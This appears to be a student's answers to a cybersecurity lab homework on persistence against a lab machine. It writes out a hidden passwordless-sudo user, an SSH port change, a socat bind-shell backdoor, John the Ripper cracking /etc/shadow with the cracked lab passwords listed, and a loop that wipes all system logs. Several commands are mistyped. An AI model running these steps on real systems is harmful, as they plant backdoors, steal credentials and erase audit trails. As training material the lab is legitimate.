{\rtf1\ansi\ansicpg1252\cocoartf2512
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Arial-BoldMT;\f1\froman\fcharset0 Times-Roman;\f2\fswiss\fcharset0 ArialMT;
\f3\froman\fcharset0 Times-Bold;\f4\fswiss\fcharset0 Arial-BoldItalicMT;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red22\green21\blue22;\red246\green246\blue246;
}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\cssrgb\c11373\c10980\c11373;\cssrgb\c97255\c97255\c97255;
}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}
{\list\listtemplateid2\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid101\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid2}
{\list\listtemplateid3\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid201\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid3}
{\list\listtemplateid4\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid301\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid4}
{\list\listtemplateid5\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid401\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid5}
{\list\listtemplateid6\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid501\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid6}
{\list\listtemplateid7\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid601\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid7}
{\list\listtemplateid8\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid701\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid8}
{\list\listtemplateid9\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid801\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid9}
{\list\listtemplateid10\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid901\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid10}
{\list\listtemplateid11\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1001\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid11}
{\list\listtemplateid12\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1101\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{circle\}}{\leveltext\leveltemplateid1102\'01\uc0\u9702 ;}{\levelnumbers;}\fi-360\li1440\lin1440 }{\listname ;}\listid12}
{\list\listtemplateid13\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1201\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{circle\}}{\leveltext\leveltemplateid1202\'01\uc0\u9702 ;}{\levelnumbers;}\fi-360\li1440\lin1440 }{\listname ;}\listid13}
{\list\listtemplateid14\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1301\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid14}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}{\listoverride\listid2\listoverridecount0\ls2}{\listoverride\listid3\listoverridecount0\ls3}{\listoverride\listid4\listoverridecount0\ls4}{\listoverride\listid5\listoverridecount0\ls5}{\listoverride\listid6\listoverridecount0\ls6}{\listoverride\listid7\listoverridecount0\ls7}{\listoverride\listid8\listoverridecount0\ls8}{\listoverride\listid9\listoverridecount0\ls9}{\listoverride\listid10\listoverridecount0\ls10}{\listoverride\listid11\listoverridecount0\ls11}{\listoverride\listid12\listoverridecount0\ls12}{\listoverride\listid13\listoverridecount0\ls13}{\listoverride\listid14\listoverridecount0\ls14}}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl1100\sa320\partightenfactor0

\f0\b\fs80 \cf2 \expnd0\expndtw0\kerning0
\ul \ulc2 \outl0\strokewidth0 \strokec2 Unit 6 Hw
\f1\b0\fs24 \ulnone \
\pard\pardeftab720\partightenfactor0
\cf2 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\fs29\fsmilli14667 \cf2 Create a secret user named sysd. Make sure this user doesn't have a home folder created.
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls1\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Useradd --system -M sysd\uc0\u8232 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0 \cf2 Give your secret user a password.
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls2\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Passwd sysd Created UNIX passwd: sysd\'a0\uc0\u8232 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0 \cf2 Give your secret user a system UID < 1000.
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls3\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Usermod -u 999 sysd (check with id sysd)\uc0\u8232 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0 \cf2 Give your secret user the same GID
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls4\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Groupmod -g 999 sysd (check with id sysd)\uc0\u8232 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0 \cf2 Give your secret user full sudo access without the need for a password.
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls5\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Visudo\'a0\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls5\ilvl0\cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 sysd ALL=(ALL) NOPASSWD:ALL\uc0\u8232 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0 \cf2 Test that sudo access works without your password
\f1\fs24 \

\f2\fs29\fsmilli14667 Switch user: su sysd, ran sudo -l\'a0
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls6\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Received output of ALL NOPASSWD:ALL\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls6\ilvl0\cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Tested with sudo cat/etc/shadow and user password revealed\'a0\uc0\u8232 \
\pard\pardeftab720\sl400\partightenfactor0

\f2\b0 \cf2 Your BASH commands go here
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls7\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Entered Root: su root (entered root password)\uc0\u8232 \
\pard\pardeftab720\sl620\sa106\partightenfactor0

\fs45\fsmilli22667 \cf2 Allow ssh access over port 2222.
\f3\fs36 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls8\ilvl0
\f0\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 nano etc/ssh/sshd_config\uc0\u8232 \
\ls8\ilvl0\kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Added port 2222, left uncommented\'a0\uc0\u8232 \
\pard\pardeftab720\partightenfactor0

\f1\b0\fs24 \cf2 \
\pard\pardeftab720\sl400\partightenfactor0

\f2\fs29\fsmilli14667 \cf2 Your BASH commands go here
\f1\fs24 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\fs29\fsmilli14667 \cf2 Note the IP address of this system:
\fs18\fsmilli9333 :
\f0\b\fs37\fsmilli18667 192.168.210.55\'a0
\f1\b0\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls9\ilvl0
\f2\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 YOUR SOLUTION COMMAND HERE Exit the root accout.\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls9\ilvl0
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 su student - switched back to student user (kept terminal open)\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls9\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 YOUR SOLUTION COMMAND HERE SSH to the machine using your sysd account and port 2222
\f0\b \uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls10\ilvl0\cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 ssh sysd@ 192.168.210.55 -p 2222 (entered password after)\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls11\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 YOUR SOLUTION COMMAND HERE 
\f0\b su root (entered password for root)
\f2\b0 \uc0\u8232 \
\pard\pardeftab720\sl460\sa106\partightenfactor0

\f0\b\fs34\fsmilli17333 \cf2 Create a backdoor with socat
\f3\fs28 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\f2\b0\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Install socat\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl400\partightenfactor0
\ls12\ilvl1
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 sudo apt socal install (still in root)\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Run Socat command in the background\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl440\partightenfactor0
\ls12\ilvl1
\f0\b\fs32 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 socat TCP4-Listen:3177,fork EXEC:/bin/bash &
\f2\b0 \uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Explain each part of the socat command:\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl400\partightenfactor0
\ls12\ilvl1
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Socat - runs socat (socat is a command based utility that establishes two bidirectional byte streams and transfers data between them)\'a0\uc0\u8232 \
\ls12\ilvl1\kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 TCP4-Listen:3177-specifies which port to \'93listen\'94 to\uc0\u8232 \
\ls12\ilvl1\kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 fork,EXEC :/bin/bash/ - relays a new process for the connection then executes to /bin/bash/ directory\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Exit the SSH session\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl400\partightenfactor0
\ls12\ilvl1
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Exit out of terminal\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Test socat connection from your local machine\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl400\partightenfactor0
\ls12\ilvl1
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 socat STDIO TCP4:192.168.210.55 -p 2222\uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls12\ilvl0
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Close the socat connection.\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl400\sa320\partightenfactor0
\ls12\ilvl1
\f0\b \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Type exit or close the terminal window\uc0\u8232 \
\pard\pardeftab720\sl620\sa106\partightenfactor0

\fs45\fsmilli22667 \cf2 Crack 
\f4\i all
\f0\i0  the passwords
\f3\fs36 \
\pard\pardeftab720\sl400\sa320\partightenfactor0

\f2\b0\fs29\fsmilli14667 \cf2 Ssh back to the system using your sysd account
\f1\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls13\ilvl0
\f0\b\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 ssh sysd@ 192.168.210.55 -p 2222
\f2\b0 \uc0\u8232 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\partightenfactor0
\ls13\ilvl0\cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Use John to crack the entire /etc/shadow file\uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\sl420\partightenfactor0
\ls13\ilvl1
\f0\b\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Desktop\'a0 Documents\'a0 Downloads\'a0 Found_Flags\'a0 foundflags.txt\'a0 Pictures\'a0 Public\'a0 Scavflags.txt\'a0 Videos
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 student:~\\ $ su root
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Password:
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 You found flag_7:$1$zmr05X2t$QfOdeJVDpph5pBPpVL6oy0
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 root@ubuntu-headless:/home/student# john /etc/shadow
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Loaded 9 password hashes with 9 different salts (crypt, generic crypt(3) [?/64])
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Press 'q' or Ctrl-C to abort, almost any other key for status
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 sysd \'a0 \'a0 \'a0 \'a0 \'a0 \'a0 (sysd)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 root \'a0 \'a0 \'a0 \'a0 \'a0 \'a0 (root)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 computer \'a0 \'a0 \'a0 \'a0 (stallman)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 freedom\'a0 \'a0 \'a0 \'a0 \'a0 (babbage)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 trustno1 \'a0 \'a0 \'a0 \'a0 (mitnik)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 dragon \'a0 \'a0 \'a0 \'a0 \'a0 (lovelace)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 lakers \'a0 \'a0 \'a0 \'a0 \'a0 (turing)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 passw0rd \'a0 \'a0 \'a0 \'a0 (sysadmin)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Goodluck!\'a0 \'a0 \'a0 \'a0 (student)
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 9g 0:00:06:08 100% 2/3 0.02441g/s 298.6p/s 306.2c/s 306.2C/s Missy!..Jupiter!
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Use the "--show" option to display all of the cracked passwords reliably
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\ls13\ilvl1
\fs30\fsmilli15333 \cf3 \cb4 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec3 Session completed
\fs29\fsmilli14667 \cf2 \cb1 \strokec2 \uc0\u8232 \
\pard\tx940\tx1440\pardeftab720\li1440\fi-1440\partightenfactor0
\ls13\ilvl1
\f2\b0 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u9702 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 \uc0\u8232 \
\pard\pardeftab720\sl620\sa106\partightenfactor0

\f0\b\fs45\fsmilli22667 \cf2 Cover your tracks
\f3\fs36 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl400\sa320\partightenfactor0
\ls14\ilvl0
\f2\b0\fs29\fsmilli14667 \cf2 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 Use socat and a for loop to clear all system logs.\uc0\u8232 \
\pard\pardeftab720\li960\sl400\sa320\partightenfactor0

\f0\b \cf2 for log in $(ls /var/log); do echo \'93\'94 > /var/log/$\{log\} ;done\'a0
\f1\b0\fs24 \
\pard\pardeftab720\partightenfactor0
\cf2 \
}